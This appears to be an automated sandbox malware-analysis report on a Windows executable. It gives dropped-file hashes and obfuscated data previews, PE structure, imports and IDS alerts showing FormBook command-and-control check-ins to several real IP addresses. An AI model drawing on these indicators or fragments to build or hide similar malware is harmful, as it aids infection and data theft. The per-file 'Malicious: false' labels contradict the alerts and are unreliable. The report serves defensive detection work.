SHA1:	D531F78F2D065C01A278FE50B632CC8B501A792A
SHA-256:	B111047B56976E8DBDECCFBC73ECC56AB93032D1421E808CEBD87F93156C2BA3
SHA-512:	C68EFA7352E9ACAC213C513B6E5AA91EC5F53D4EF20F77546DF40F1732212FAFE874417DBF67656A3C0194D50574A74BFDFC562578E94CBD28D3F55A756F27ED
Malicious:	false
Reputation:	low
Preview:	EA06.....Zo.........SP.n......5e...`.....\|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....\|.0...&d.....Hz..a....l?..uo.....P......V0....j......\|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8\|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...\|...<..aw.].3c..H.@B?...G..1...' ....k\|.A.O..#.....}V`....#..H\|.P!..d....0z....Y..>K..G./....G.7c.H..b....W..1....?.01..b.!...@.?..o.F\|....p9......S.!..nb.!....zb0..

C:\Users\user\AppData\Local\Temp\autF998.tmp

Download File

Process:	C:\Users\user\Desktop\4sfN3Gx1vO.exe
File Type:	data
Category:	dropped
Size (bytes):	289792
Entropy (8bit):	7.993190191716649
Encrypted:	true
SSDEEP:	6144:a0SXLhhr1R/pg26M0pvAxOJlw8gavVC7UvPS5pFKvQwXjlnUaAbEqV0c6w:a0SlhJRRRR0eoXw8ukCn5K2aqJ09w
MD5:	22BABDA68A3954AA10B0B0281E3AC687
SHA1:	63B04C48CE1E3A8222D2A86A767EAEC6584515F5
SHA-256:	83E0D0F4ECC101A16194F7232E7BBDCA84F70262BEB3C573435E7579C3748BFE
SHA-512:	4CF9562C1ECC6086C6F8AAF6247FE5E67BA18CD7BDEE442A0F98EEB90360CDA80FB4E9181DD1113A7611ACB9200211DF46A253809E0C5534964FA7C1423638F4
Malicious:	false
Reputation:	low
Preview:	...0SMUE19SM.X9.SCYPS0P.UE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS.PMUK.]M.Q...R..q.X9>u5GV4?W5xZY=-6$sR5m'0[.:#...j.>,=5}=]GqE59SM6X!81.~97..0.xU^.W...X4.C...l-2./....8?.j: 1m3W.MUE59SM6..98.BXP>...UE59SM6X.9:RHX[S0.IUE59SM6XX.,SCY@S0P=QE59.M6HX98QCYVS0PMUE5?SM6XX98S3]PS2PMUE59QMv.X9(SCIPS0P]UE%9SM6XX)8SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XvM]+7YPSt.IUE%9SMl\X9(SCYPS0PMUE59SM.XXY8SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM

C:\Users\user\AppData\Local\Temp\konked

Download File

Process:	C:\Users\user\Desktop\4sfN3Gx1vO.exe
File Type:	data
Category:	dropped
Size (bytes):	289792
Entropy (8bit):	7.993190191716649
Encrypted:	true
SSDEEP:	6144:a0SXLhhr1R/pg26M0pvAxOJlw8gavVC7UvPS5pFKvQwXjlnUaAbEqV0c6w:a0SlhJRRRR0eoXw8ukCn5K2aqJ09w
MD5:	22BABDA68A3954AA10B0B0281E3AC687
SHA1:	63B04C48CE1E3A8222D2A86A767EAEC6584515F5
SHA-256:	83E0D0F4ECC101A16194F7232E7BBDCA84F70262BEB3C573435E7579C3748BFE
SHA-512:	4CF9562C1ECC6086C6F8AAF6247FE5E67BA18CD7BDEE442A0F98EEB90360CDA80FB4E9181DD1113A7611ACB9200211DF46A253809E0C5534964FA7C1423638F4
Malicious:	false
Preview:	...0SMUE19SM.X9.SCYPS0P.UE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS.PMUK.]M.Q...R..q.X9>u5GV4?W5xZY=-6$sR5m'0[.:#...j.>,=5}=]GqE59SM6X!81.~97..0.xU^.W...X4.C...l-2./....8?.j: 1m3W.MUE59SM6..98.BXP>...UE59SM6X.9:RHX[S0.IUE59SM6XX.,SCY@S0P=QE59.M6HX98QCYVS0PMUE5?SM6XX98S3]PS2PMUE59QMv.X9(SCIPS0P]UE%9SM6XX)8SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XvM]+7YPSt.IUE%9SMl\X9(SCYPS0PMUE59SM.XXY8SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM

C:\Users\user\AppData\Local\Temp\nonplacental

Download File

Process:	C:\Users\user\Desktop\4sfN3Gx1vO.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	172054
Entropy (8bit):	3.180914922088335
Encrypted:	false
SSDEEP:	48:sb3feqfCpfS6ftqfA0f9fWf9fZ1fi20fq0fFfY6fofi51fK0fi0fCfZ1fK0f70fv:iaNhCHcZLfaDfJQNy7Ha7CkJ0FZIklX
MD5:	3A122E0B0905AB3F0B785723FBFD51AD
SHA1:	41D84A5806FE3F8E66FA30FBDB6837B086250A56
SHA-256:	11BA5A39B30D7D81C98E3E5AF3761F4F27C0CC5B0B3F0B6F60CDA4735F651C9E
SHA-512:	5D5670A332BA5C0D09178327C25088230EC9656B394BB5FB13696E7495D306F7D1CEF872083571750EE806853DA7E13AF98D2BC6069BD4E4E6C5131C2C49FF9A
Malicious:	false
Preview:	hixjs0hixjsxhixjs5hixjs5hixjs8hixjsbhixjsehixjschixjs8hixjs1hixjsehixjschixjschixjschixjs0hixjs2hixjs0hixjs0hixjs0hixjs0hixjs5hixjs6hixjs5hixjs7hixjsbhixjs8hixjs6hixjsbhixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjs4hixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjs6hixjsbhixjsahixjs7hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjs8hixjsbhixjs8hixjs6hixjsehixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjsahixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjschixjsbhixjsahixjs6hixjschixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjsehixjsbhixjs8hixjs3hixjs3hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs9hixjs0hixjsbhixjs9hixjs3hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixj

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.130152906080185
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	4sfN3Gx1vO.exe
File size:	1'245'696 bytes
MD5:	f6f040a290cc9c41a1b07307f12310e5
SHA1:	c34b80ea358bbddc007a7e9054f9d71eee00799f
SHA256:	e1c5b7a7fa4b308e50aa7061dd1e691cd253f63dc99745977164ec5d5311047a
SHA512:	e999cb475da64e389c2cd05278b207b3cd79a52eb98b28b9c92f08a564657cbd42f60254dd091a3199f517067330fe16af4c46abd54207209094da361e9d78e3
SSDEEP:	24576:yqDEvCTbMWu7rQYlBQcBiT6rprG8aTI6Cds1SZvvE2X:yTvC/MTQYxsWR7aTI6CdqsX
TLSH:	6845CF0273C1C022FF9B92734B5AF6515BBC69260123E61F13A81D7ABE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67689E8E [Sun Dec 22 23:19:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FD521496693h
jmp 00007FD521495F9Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FD52149617Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FD52149614Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FD521498D3Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FD521498D88h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FD521498D71h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x5971c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12e000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x5971c	0x59800	c476d4c9f0f7f9530f3c5cb713ef55be	False	0.9266186932611732	data	7.891352840206034	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12e000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x509e4	data			1.0003361476869406
RT_GROUP_ICON	0x12d19c	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x12d214	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x12d228	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x12d23c	0x14	data	English	Great Britain	1.25
RT_VERSION	0x12d250	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x12d32c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T18:03:35.763872+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49990	104.21.64.1	80	TCP
2025-01-10T18:04:26.663076+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49892	161.97.142.144	80	TCP
2025-01-10T18:04:42.525231+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49979	172.96.187.60	80	TCP
2025-01-10T18:04:45.239495+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49980	172.96.187.60	80	TCP
2025-01-10T18:04:47.653195+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49981	172.96.187.60	80	TCP
2025-01-10T18:04:50.155662+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49982	172.96.187.60	80	TCP
2025-01-10T18:04:56.451357+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49983	185.199.108.153	80	TCP
2025-01-10T18:04:58.992300+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49984	185.199.108.153	80	TCP
